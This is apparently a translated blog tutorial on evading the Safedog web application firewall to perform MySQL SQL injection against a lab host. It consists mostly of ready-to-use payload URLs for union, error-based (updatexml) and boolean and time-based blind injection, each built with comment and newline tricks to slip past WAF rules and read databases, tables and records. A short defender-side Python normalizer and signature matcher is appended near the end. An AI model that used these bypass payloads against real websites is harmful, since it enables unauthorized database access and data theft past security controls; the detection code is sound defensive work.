Bypass MySQL Safedog
Beating up the dog (Safedog) together with the team
Detecting the injection point
Safedog does not allow a basic arithmetic operator followed by a numeric string
Bypass with special operators
Bypass with hexadecimal
Bypass with BINARY
Bypass with the conv() function
Bypass with the concat() function
Determining the number of columns
Bypassing order by
Inline comments
Comment followed by a newline
Union query
The key is to break up "union select"
Inline comment
http://172.16.1.157/sql/Less-1/?id=-1' /*!14440union*//*!14440select */1,2,3 -- +
Comment followed by junk characters and a newline
union distinct | distinctrow | all
Next comes reading data. Here I use the comment-plus-junk-plus-newline method, i.e. %23a%0a, for the bypass; you can also use the /*!14440*/ inline comment described above.
Reading the current database name
http://172.16.1.157/sql/Less-1/?id=-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +
Reading other database names. With Safedog 4.0 this gets through while the information_schema protection is off (the default); once information_schema protection is enabled there is no way past it, sob 😭
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select schema_name from %23%0ainformation_schema.schemata limit 1,1),3 -- +
Reading table names
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select table_name from %23%0ainformation_schema.tables where table_schema=database(%23%0a) limit 1,1),3 -- +
Reading column names, first with information_schema protection disabled
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a select 1,(select column_name from %23%0a information_schema.columns where table_name=0x7573657273 and%23a%0a table_schema=database(%23%0a) limit 1,1),3 -- +
With information_schema protection enabled there are two approaches, but the table name must already be known
1. Subquery
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a SELECT 1,2,x.2 from %23a%0a(SELECT * from %23a%0a (SELECT 1)a, (SELECT 2)b union %23a%0aSELECT *from %23a%0aemails)x limit 2,1 -- +
2. Use join and using to leak column names through error messages; this requires the page to display errors and the table name to be known
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b) c) -- +
Then keep leaking further columns with using
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b using(id)) c) -- +
Reading data
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select email_id from%23a%0a emails limit 1,1) -- +
Actually, using a MySQL 5.7 feature, the sys database can be used for the bypass; see the article chabug published, 注入bypass之捶狗開鎖破盾 (on injection bypass against Safedog).
The rest of this post does not mention the bypass for enabled information_schema protection again; work it out from the above.
Error-based injection
Only updatexml error-based injection is covered
The key is to break up the updatexml() structure
and updatexml(1,1,1   (not blocked)
and updatexml(1,1,1)   (blocked)
As long as the rule cannot match updatexml together with both parentheses, it passes
Username and database name
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,user(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,database(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
Database name
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select schema_name from %23a%0a information_schema.schemata limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
Table name
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select table_name from %23a%0a information_schema.tables where table_schema=database(/*!)*/ limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
Column name
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select column_name from %23a%0a information_schema.columns where table_schema=database(/*!)*/ and %23a%0atable_name=0x7573657273 limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
Reading data
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,(select email_id from %23a%0a emails limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
Blind injection
Covered as boolean-based and time-based blind injection
Boolean-based blind injection
Do not let the rule match a complete pair of parentheses
Using left() or right()
http://172.16.1.157/sql/Less-1/?id=1' and hex(LEFT(user(/*!)*/,1))=%23a%0a72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(right(user(/*!)*/,1))=%23a%0a72 -- +
Using substring() or substr()
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTRING(user(/*!)*/,1,1))=72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(substr(user(/*!)*/,1,1))=72 -- +
Reading table names
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTR((select table_name from %23a%0a information_schema.tables where table_schema=%23a%0adatabase%23a%0a(/*!)*/ limit 0,1),1,1))=65-- +
Column names and field names work the same way; omitted
Time-based blind injection
Do not let paired parentheses match
sleep() bypass
Reading the user
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=char(114),sleep(3/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=0x72,sleep(3/*!)*/,1/*!)*/ -- +
Reading data; limit does not get through
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left((select group_concat(table_name/*!)*/ from%23a%0ainformation_schema.tables where table_schema=database(/*!)*/ /*!)*/,1/*!)*/=0x65,sleep(5/*!)*/,1/*!)*/ -- +
Other
length() for string length
count()
http://172.16.1.157/sql/Less-1/?id=1' and (%23a%0aselect count(password/*!)*/ from %23a%0a users/*!)*/<=>13 -- +
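Every payload on this page relies on the same few MySQL parser quirks: /*!NNNNN ... */ and /*! ... */ bodies are executed, a # comment runs to the next newline (%23junk%0a), and backtick-quoted function names are still function calls. As an added defender-side illustration, not part of the original post, the following Python normalizer reduces a raw parameter to what the MySQL parser actually sees before applying plain signature checks; the sample payloads are constructed in the style of the union, updatexml and blind sections above.

```python
import re
from urllib.parse import unquote

# Constructed samples in the style of the post's payloads (not a real capture).
SAMPLES = {
    "versioned": "-1' /*!14440union*//*!14440select */1,2,3 -- +",
    "hash_newline": "-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +",
    "updatexml": "-1' and updatexml(1,concat(0x7e,user(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +",
    "time_blind": "1' and if%23%0a(left(user(/*!)*/,1/*!)*/=0x72,sleep(3/*!)*/,1/*!)*/ -- +",
    "benign": "1",
}

# /*!NNNNN ... */ and /*! ... */ are executed by MySQL: keep the body.
VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
# An ordinary /* ... */ is a real comment: drop it.
BLOCK = re.compile(r"/\*.*?\*/", re.S)
# '# ...' and '-- ...' run to end of line, which is what %23junk%0a exploits.
LINE = re.compile(r"(?:#|--[ \t]).*?(?:\n|$)")


def normalize(raw: str) -> str:
    """Reduce a raw parameter value to what the MySQL parser would actually see."""
    s = unquote(raw)                 # %23 -> '#', %0a -> newline
    s = s.replace("`", "")           # `concat` is just concat to the parser
    s = VERSIONED.sub(r" \1 ", s)    # un-hide union / select / ')' bodies
    s = BLOCK.sub(" ", s)
    s = LINE.sub("\n", s)            # strip the junk after '#'
    s = re.sub(r"\s+", " ", s)       # collapse the newlines left behind
    return s.strip().lower()


# Deliberately simple signatures; they only work because they run on the normalized form.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:(?:all|distinct|distinctrow)\s+)?select\b"),
    "updatexml": re.compile(r"\bupdatexml\s*\(.*\)"),
    "info_schema": re.compile(r"\binformation_schema\s*\.\s*\w+"),
    "sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),
}


def match_signatures(raw: str) -> list[str]:
    """Names of the signatures that fire on the normalized payload."""
    norm = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label:13} {match_signatures(payload)}  <- {normalize(payload)}")
```

Running the raw (un-normalized) samples through the same signatures shows the gap the post exploits: the versioned-comment union payload matches nothing until the comment bodies are unwrapped.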
References
My writing is poor, the wording flippant, the content shallow, and the technique clumsy. Corrections and pointers from the masters are welcome; many thanks.